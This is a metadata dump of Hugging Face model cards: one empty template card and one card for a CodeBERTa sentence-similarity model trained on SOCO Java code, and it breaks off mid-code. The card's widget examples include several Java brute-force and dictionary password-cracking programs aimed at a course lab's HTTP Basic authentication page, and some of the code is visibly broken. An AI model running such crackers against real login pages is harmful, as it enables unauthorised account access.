modelId
stringlengths 5
139
| author
stringlengths 2
42
| last_modified
timestamp[us, tz=UTC]date 2020-02-15 11:33:14
2025-09-24 06:28:30
| downloads
int64 0
223M
| likes
int64 0
11.7k
| library_name
stringclasses 573
values | tags
listlengths 1
4.05k
| pipeline_tag
stringclasses 55
values | createdAt
timestamp[us, tz=UTC]date 2022-03-02 23:29:04
2025-09-24 06:27:16
| card
stringlengths 11
1.01M
|
---|---|---|---|---|---|---|---|---|---|
bedio/MobileLLM-R1-140M-base_stack_48
|
bedio
| 2025-09-23T16:02:41Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"llama4_text",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T16:02:30Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
buelfhood/SOCO-Java-codeberta-cmnrl-triplets-ep1-bs16-lr2e-05-split0.1
|
buelfhood
| 2025-09-23T15:58:51Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"roberta",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:38664",
"loss:CachedMultipleNegativesRankingLoss",
"dataset:buelfhood/SOCO_TRAIN_java",
"arxiv:1908.10084",
"arxiv:2101.06983",
"base_model:huggingface/CodeBERTa-small-v1",
"base_model:finetune:huggingface/CodeBERTa-small-v1",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T15:58:40Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:38664
- loss:CachedMultipleNegativesRankingLoss
base_model: huggingface/CodeBERTa-small-v1
widget:
- source_sentence: "\n\nimport java.net.*;\nimport java.io.*;\n\npublic class sendMail\
\ {\n\npublic void sendMail(String mailServer, String recipient, String result)\
\ {\n try {\n Socket s = new Socket(mailServer, 25);\n BufferedReader\
\ in = new BufferedReader\n (new InputStreamReader(s.getInputStream(),\
\ \"8859_1\"));\n BufferedWriter out = new BufferedWriter\n (new\
\ OutputStreamWriter(s.getOutputStream(), \"8859_1\"));\n\n send(in, out,\
\ \"HELO client\");\n\n send(in, out, \"MAIL FROM: <WatchDog@SecureECommerce.>\"\
);\n send(in, out, \"RCPT : \" + recipient);\n send(in, out, \"DATA\"\
);\n send(out, \"Subject: \");\n send(out, \"From: Admin <WatchDog@SecureECommerce.>\"\
);\n send (out, \"\\n\");\n \n send(out, result);\n send(out,\
\ \"\\n.\\n\");\n send(in, out, \"QUIT\");\n\n }\n catch (Exception\
\ e) {\n e.printStackTrace();\n }\n }\n\n public void send(BufferedReader\
\ in, BufferedWriter out, String s) {\n try {\n out.write(s + \"\\n\");\n\
\ out.flush();\n System.out.println(s);\n s = in.readLine();\n\
\ System.out.println(s);\n }\n catch (Exception e) {\n e.printStackTrace();\n\
\ }\n }\n\n public void send(BufferedWriter out, String s) {\n try {\n\
\ out.write(s + \"\\n\");\n out.flush();\n System.out.println(s);\n\
\ }\n catch (Exception e) {\n e.printStackTrace();\n }\n }\n\
}"
sentences:
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class BruteForce\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n BruteForce a = new BruteForce();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n int attempts = 0;\n exit:\n\
\ for (int i=0;i<pwdArray.length;i++) {\n\t\t for (int j=0;j<pwdArray.length;j++)\
\ {\n\t\t\t for (int k=0;k<pwdArray.length;k++) {\n\t\t\t\t if (pwdArray[i] ==\
\ ' ' && pwdArray[j] != ' ') continue;\n\t\t\t\t if (pwdArray[j] == ' ' && pwdArray[k]\
\ != ' ') continue;\n\t\t\t\t inp[2] = inp[2] + pwdArray[i] + pwdArray[j] + pwdArray[k];\n\
\t\t\t\t attempts++;\n \t\t\t a.doit(inp);\n \n \t\t\t\t if (status) {\n\
\t\t\t\t\t System.out.println(\"Crrect password is: \" + inp[2]);\n\t\t\t\t\t\
\ System.out.println(\"Number of attempts = \" + attempts);\n\t\t\t\t\t break\
\ exit;\n\t\t\t \t }\n \t\t\t inp[2] = \"\";\n\t\t \t }\n\t \t }\n }\n\
\ }\n\n public void doit(String args[]) {\n \n try {\n BufferedReader\
\ in = new BufferedReader(\n new InputStreamReader\n (connectURL(new\
\ URL(args[0]), args[1], args[2])));\n String line;\n while ((line\
\ = in.readLine()) != null) {\n System.out.println(line);\n \
\ status = true;\n }\n }\n catch (IOException e) {\n \n\
\ }\n }\n\n public InputStream connectURL (URL url, String uname,\
\ String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char pwdArray [] = {\n\t 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n\
\t 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n\t 'q', 'r', 's', 't',\
\ 'u', 'v', 'w', 'x',\n\t 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F',\n\t \
\ 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n\t 'O', 'P', 'Q', 'R',\
\ 'S', 'T', 'U', 'V',\n\t 'W', 'X', 'Y', 'Z', ' '\n };\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\nimport java.io.*;\n\npublic class PasswordFile {\n \n private String\
\ strFilepath;\n private String strCurrWord;\n private File fWordFile;\n\
\ private BufferedReader in;\n \n \n public PasswordFile(String filepath)\
\ {\n strFilepath = filepath;\n try {\n fWordFile = new\
\ File(strFilepath);\n in = new BufferedReader(new FileReader(fWordFile));\n\
\ }\n catch(Exception e)\n {\n System.out.println(\"\
Could not open file \" + strFilepath);\n }\n }\n \n String getPassword()\
\ {\n return strCurrWord;\n }\n \n String getNextPassword() {\n\
\ try {\n strCurrWord = in.readLine();\n \n \
\ \n \n }\n catch (Exception e)\n {\n \
\ \n return null;\n }\n \n return\
\ strCurrWord;\n }\n \n}\n"
- "\n\nimport java.net.*;\nimport java.io.*;\n\npublic class SendEMail {\n\n public\
\ void SendEMail(){}\n\npublic void sendMail(String recipient,String c, String\
\ subject){\n try {\n\n Socket s = new Socket(\"yallara.cs.rmit.edu.\"\
, 25);\n BufferedReader in = new BufferedReader\n (new InputStreamReader(s.getInputStream(),\
\ \"8859_1\"));\n BufferedWriter out = new BufferedWriter\n (new\
\ OutputStreamWriter(s.getOutputStream(), \"8859_1\"));\n\n send(in, out,\
\ \"HELO theWorld\");\n \n \n send(in, out, \"MAIL FROM: <watch@dog.>\"\
);\n send(in, out, \"RCPT : \"+recipient);\n send(in, out, \"DATA\"\
);\n send(out, \"Subject: \"+ subject);\n send(out, \"From: WatchDog.java\"\
);\n send (out, \"\\n\");\n \n BufferedReader reader;\n String\
\ line;\n reader = new BufferedReader(new InputStreamReader(new FileInputStream()));\n\
\ line = reader.readLine();\n while (line != null){\n send(out,\
\ line);\n line = reader.readLine();\n }\n send(out, \"\\n.\\\
n\");\n send(in, out, \"QUIT\");\n s.print();\n }\n catch (Exception\
\ e) {\n e.printStackTrace();\n }\n }\n\n public void send(BufferedReader\
\ in, BufferedWriter out, String s) {\n try {\n out.write(s + \"\\n\");\n\
\ out.flush();\n System.out.println(s);\n s = in.readLine();\n\
\ System.out.println(s);\n }\n catch (Exception e) {\n e.printStackTrace();\n\
\ }\n }\n\n public void send(BufferedWriter out, String s) {\n try {\n\
\ out.write(s + \"\\n\");\n out.flush();\n System.out.println(s);\n\
\ }\n catch (Exception e) {\n e.printStackTrace();\n }\n }\n\
}"
- source_sentence: "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\n\
import java.io.*;\nimport java.net.*;\n\n\n\npublic class BruteForce\n{\n private\
\ URL url;\n private HttpURLConnection connection ;\n private int stopTime\
\ = 0;\n private int startTime = 0;\n private int count = 0;\n\n public\
\ BruteForce()\n {\n System.out.println(\"Process is running...\");\n \
\ startTime = System.currentTimeMillis();\n threeLetters();\n twoLetters();\n\
\ }\n\n public static void main (String args[])\n {\n BruteForce bf\
\ = new BruteForce();\n }\n \n public void threeLetters()\n {\n String\
\ s1;\n char [] a = {'a','a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n\
\ {\n for (int i1 = 0; i1 < 26; i1++)\n {\n for\
\ (int i2 = 0; i2 < 26; i2++)\n {\n s1 = String.valueOf((char)(a[0]\
\ + i0)) + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1))\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ String.valueOf((char)(a[0] + i0)) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\
\ +\n String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] +\
\ i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\
\ + i2));\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1]\
\ + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\
\ decision(s1);\n count++;\n\n s1 =\
\ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\
\ + i1))).toUpperCase() + String.valueOf((char)(a[2] + i2));\n decision(s1);\n\
\ count++;\n }\n }\n }\n }\n \n public\
\ void twoLetters()\n {\n String s1;\n char [] a = {'a','a'};\n\n\
\ for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1\
\ < 26; i1++)\n {\n s1 = String.valueOf((char)(a[0] + i0))\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1]\
\ + i1)).toUpperCase();\n decision(s1);\n count++;\n\n \
\ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n \
\ (String.valueOf((char)(a[1] + i1))).toUpperCase();\n decision(s1);\n\
\ count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase()\
\ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \
\ count++;\n }\n }\n }\n\n \n public void decision(String\
\ s1)\n {\n if (find(s1) == 200)\n {\n stopTime = System.currentTimeMillis();\n\
\ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\
);\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\
\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\
\ Web site: \");\n displayContent(s1);\n System.out.println(\"\
\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\
\\nNumber of attempts: \" + count);\n System.out.println();\n\n \
\ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\
\ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\
\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\
\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\
\ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\
\ }\n return responseCode;\n }\n\n \n public void displayContent(String\
\ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\
\ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\
Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\
\ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\
\ {\n InputStreamReader reader = new InputStreamReader (stream);\n\
\ bw = new BufferedReader (reader);\n String line;\n\n\
\ while ((line = bw.readLine()) != null)\n {\n \
\ System.out.println(line);\n }\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\
\ }\n }\n}\n\n\n\n\n"
sentences:
- "import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport java.util.*;\n\
\nclass BruteForce {\n\n String password=\"\";\n\n int num =401;\n\n\n \
\ public static void main (String[] args) {\n\n String str=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\
;\n\n BruteForce URLcon;\n\n int length = 0;\n\n String passwd=\"\
\";\n\n int t0,t1;\n\n \n if (args.length == 0) {\n \t\n\
\ \tSystem.err.println (\n \t\t\n \t\t\"Usage : java BruteForce\
\ <username>\");\n \treturn;\n \t\n \t}\n String username\
\ = args[0];\n \n\n t0=System.currentTimeMillis();\n\n System.out.println\
\ (\" \" + new Date());\n \n System.out.println (\"Using BruteForce\
\ method attack \"+username+\"'s password.Please waiting.......\");\n\n \
\ for (int i=0;i<str.length();i++){\n\n passwd=str.substring(i,i+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401)\
\ {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println(\"\
The password: \"+ passwd);\n\n \tdouble dt =t1-t0;\n\n\n\n \
\ \tSystem.out.println(\"It took \"+ DecimalFormat.getInstance().format(dt/1000)+\
\ \" seconds.\");\n\n System.out.println (\"Finish \" + new Date());\n\
\ \n \treturn;\n\n }\n\n for\
\ (int j=0;j<str.length();j++){\n\n passwd =str.substring(i,i+1)+str.substring(j,j+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \t t1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ double dt =t1-t0;\n\n\n\n System.out.println(\"\
It took \"+ DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ System.out.println (\"Finish \" + new Date());\n \
\ \t return;\n\n }\n for (int m=0;m<str.length();m++){\n\
\n passwd = str.substring(i,i+1)+str.substring(j,j+1)+str.substring(m,m+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ \t double dt =t1-t0;\n\n\n\n \tSystem.out.println(\"\
It took \"+DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ \n System.out.println (\"Finish \" + new\
\ Date());\n \n \t return;\n\n \
\ }\n\n\n }\n\n}\n}\n System.out.println(\" not find the\
\ password\");\n\n}\n\n public BruteForce (String password, String username){\n\
\n \t String urlString = \"http://sec-crack.cs.rmit.edu./SEC/2/\" ;\n\n \
\ \n\n try {\n\n String userPassword = username+\":\"+password ;\n\
\n String encoding = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\
\n URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection)\
\ url.openConnection();\n\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n \
\ catch(MalformedURLException e){\n \t System.out.println(e);\n \
\ }catch(IOException e){\n System.out.println(e);\n }\n\n\n \
\ }\n}"
- "\n\n\n\npublic class HoldSharedData\n{\n private int numOfConnections\
\ = 0;\n private int startTime;\n private int totalTime = 0;\n \
\ private String[] password;\n private int pwdCount;\n\n public HoldSharedData(\
\ int time, String[] pwd, int count )\n {\n startTime = time;\n\n \
\ password = pwd;\n pwdCount = count;\n }\n\n public int getPwdCount()\n\
\ {\n return pwdCount;\n }\n\n public void setNumOfConnections(\
\ )\n {\n numOfConnections ++;\n }\n\n public int getNumOfConnections()\n\
\ {\n return numOfConnections;\n }\n\n public int getStartTime()\n\
\ {\n return startTime;\n }\n\n public void setTotalTime( int\
\ newTotalTime )\n {\n totalTime = newTotalTime;\n }\n\n public\
\ int getTotalTime()\n {\n return totalTime;\n }\n\n public String\
\ getPasswordAt( int index )\n {\n return password[index];\n }\n\
} \n"
- "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\nimport java.io.*;\n\
import java.net.*;\n\n\n\npublic class Dictionary\n{\n private URL url;\n \
\ private HttpURLConnection connection ;\n private int stopTime = 0;\n private\
\ int startTime = 0;\n private int count = 0;\n\n public Dictionary()\n \
\ {\n System.out.println(\"Process is running...\");\n startTime = System.currentTimeMillis();\n\
\ findWords();\n }\n\n public static void main(String args[])\n {\n\
\ Dictionary sc = new Dictionary();\n }\n \n \n public void findWords()\n\
\ {\n try\n {\n BufferedReader input = new BufferedReader(new\
\ FileReader (\"words\"));\n String text;\n while ((text = input.readLine())\
\ != null)\n {\n if ((text.length() == 3) || (text.length()\
\ == 2))\n {\n count++;\n decision(text);\n\
\ }\n\n }\n\n }\n catch (IOException io)\n \
\ {\n System.out.println(\"File Error: \" + io.getMessage());\n }\n\
\ }\n \n \n public void decision(String s1)\n {\n if (find(s1)\
\ == 200)\n {\n stopTime = System.currentTimeMillis();\n \
\ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\
);\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\
\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\
\ Web site: \");\n displayContent(s1);\n System.out.println(\"\
\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\
\\nNumber of attempts: \" + count);\n System.out.println();\n\n \
\ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\
\ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\
\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\
\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\
\ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\
\ }\n return responseCode;\n }\n \n public void displayContent(String\
\ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\
\ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\
\ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\
Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\
\ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\
\ {\n InputStreamReader reader = new InputStreamReader (stream);\n\
\ bw = new BufferedReader (reader);\n String line;\n\n\
\ while ((line = bw.readLine()) != null)\n {\n \
\ System.out.println(line);\n }\n }\n }\n \
\ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\
\ }\n }\n}\n\n\n\n\n"
- source_sentence: "\nimport java.net.*;\nimport java.io.*;\nimport java.Ostermiller.util.*;\n\
import java.util.*;\n\npublic class MyClient1 implements Runnable\n{\n private\
\ String hostname;\n private int port;\n private String filename;\n private\
\ Socket s;\n private int n;\n private InputStream sin;\n private OutputStream\
\ sout;\n private int dif;\n private String myPassword;\n private int status;\n\
\ private int myTime;\n private Dictionary myMaster;\n \n\n public MyClient1(Dictionary\
\ dic, int num, int myPort, String password)\n {\n \n hostname = new\
\ String(\"sec-crack.cs.rmit.edu.\");\n port = myPort;\n status = 0;\n\
\ myTime = 0;\n myPassword = password;\n filename = new String(\"\
/SEC/2/\");\n myMaster = 0;\n n = num;\n dif = 0;\n \n }\n\
\ public getDif()\n {\n return dif;\n }\n public int getStatus()\n\
\ {\n return status;\n }\n public void run() \n {\n String inputLine;\n\
\ String[] tokens = new String[5];\n int i;\n myTime = 0;\n \
\ finish = 0;\n start = System.currentTimeMillis();\n try\n \
\ {\n s = new Socket( hostname, port);\n }catch( UnknownHostException\
\ e)\n {\n System.out.println(\"'t find host\");\n }catch( IOException\
\ e)\n {\n System.out.println(\"Error connecting host \"+n);\n\
\t return;\n }\n while(s.isConnected() == false)\n continue;\n\
\ \n finish = System.currentTimeMillis();\n dif = finish - start;\n\
\ \n try\n {\n sin = s.getInputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n BufferedReader fromServer = new BufferedReader(new InputStreamReader(\
\ ));\n try\n {\n sout = s.getOutputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n \n PrintWriter toServer = new PrintWriter( new OutputStreamWriter(\
\ sout));\n toServer.print(\"GET \"+filename+\" HTTP/1.0\\r\\n\"+\"Authorization:\
\ \"+Base64.encode(\"\"+\":\"+myPassword)+\"\\r\\n\\r\\n\");\n toServer.flush();\n\
\ \n try\n {\n inputLine = fromServer.readLine();\n \
\ }catch( IOException e)\n {\n System.out.println(\"'t open stream\"\
);\n\t inputLine = null;\n }\n \n java.util.StringTokenizer \
\ = new java.util.StringTokenizer( inputLine, \" \");\n i = 0;\n while(bf.hasMoreTokens())\n\
\ {\n tokens[i] =bf .nextToken();\n\t i++;\n }\n status\
\ = Integer.parseInt( tokens[1]);\n myTime = System.currentTimeMillis();\n\
\ if( status == 200)\n {\n System.out.println(\"Ok \"+myPassword);\n\
\t myMaster.retire( this);\n }\n \n toServer.send();\n try\n\
\ {\n fromServer.recieve();\n }catch( IOException e)\n \
\ {\n System.out.println(\"'t open stream\");\n }\n try\n\
\ {\n s.connect();\n }catch( IOException e)\n {\n \
\ System.out.println(\"'t connection\");\n\t System.exit(0);\n }\n\
\ }\n public getTime()\n {\n return myTime;\n }\n \n}\n"
sentences:
- "import java.net.*;\nimport java.io.*;\nimport java.*;\nimport java.Runtime.*;\n\
import java.Object.*;\nimport java.util.*;\nimport java.util.StringTokenizer;\n\
\n\npublic class ReadFile\n{\n private StringTokenizer tokenizer;\n private\
\ BufferedReader bf;\n private String line;\n private String first;\n Vector\
\ in = new Vector();\n \n public void loadFile()throws NoSuchElementException,\
\ IOException\n {\n System.out.println(\"in loadFile\");\n try{\n bf\
\ = new BufferedReader(new FileReader(\"words\"));\n }\n catch(FileNotFoundException\
\ fe){}\n catch(IOException io){}\n while((line = bf.readLine())!=null)\n\
\ {\n\n int index = 0;\n tokenizer = new StringTokenizer(line);\n\
\ try\n\t {\n\t first = tokenizer.nextToken();\n\t \n\t \n\
\t if (first.length() == 3)\n\t {\n\t\tin.add(first);\n\t }\n\t }\n\
\ catch(NoSuchElementException n)\n\t {\n System.out.println(\"\
File Loaded Succesfully\");\n\n }\n\n }\n }\n public Vector getVector()\n\
\ {\n return in;\n }\n public static void main (String args[])\n {\n\
\ Vector v = new Vector();\n try\n {\n System.out.println(\"\
in \");\n\t ReadFile rf = new ReadFile();\n rf.loadFile();\n v =\
\ rf.getVector();\n\t \n }\n catch(IOException e)\n {\n System.out.println(e);\n\
\ }\n System.out.println(\"size:\" + v.size());\n for (int i = 0;\
\ i< v.size(); i++)\n {\n System.out.println(i+1+ \":\" + v.elementAt(i));\n\
\ }\n \n \n }\n \n}\n"
- "\nimport java.net.*;\nimport java.io.*;\nimport java.Ostermiller.util.*;\nimport\
\ java.util.*;\n\npublic class MyClient2 implements Runnable\n{\n private String\
\ hostname;\n private int port;\n private String filename;\n private Socket\
\ s;\n private int n;\n private InputStream sin;\n private OutputStream\
\ sout;\n private int dif;\n private String myPassword;\n private int status;\n\
\ private int myTime;\n private BruteForce myMaster;\n \n\n public MyClient2(BruteForce\
\ bf , int num, int myPort, String password)\n {\n \n hostname = new\
\ String(\"sec-crack.cs.rmit.edu.\");\n port = myPort;\n status = 0;\n\
\ myTime = 0;\n myPassword = password;\n filename = new String(\"\
/SEC/2/\");\n myMaster = 0;\n n = num;\n dif = 0;\n \n }\n\
\ public getDif()\n {\n return dif;\n }\n public int getStatus()\n\
\ {\n return status;\n }\n public void run() \n {\n String inputLine;\n\
\ String[] tokens = new String[5];\n int i;\n myTime = 0;\n \
\ finish = 0;\n start = System.currentTimeMillis();\n try\n \
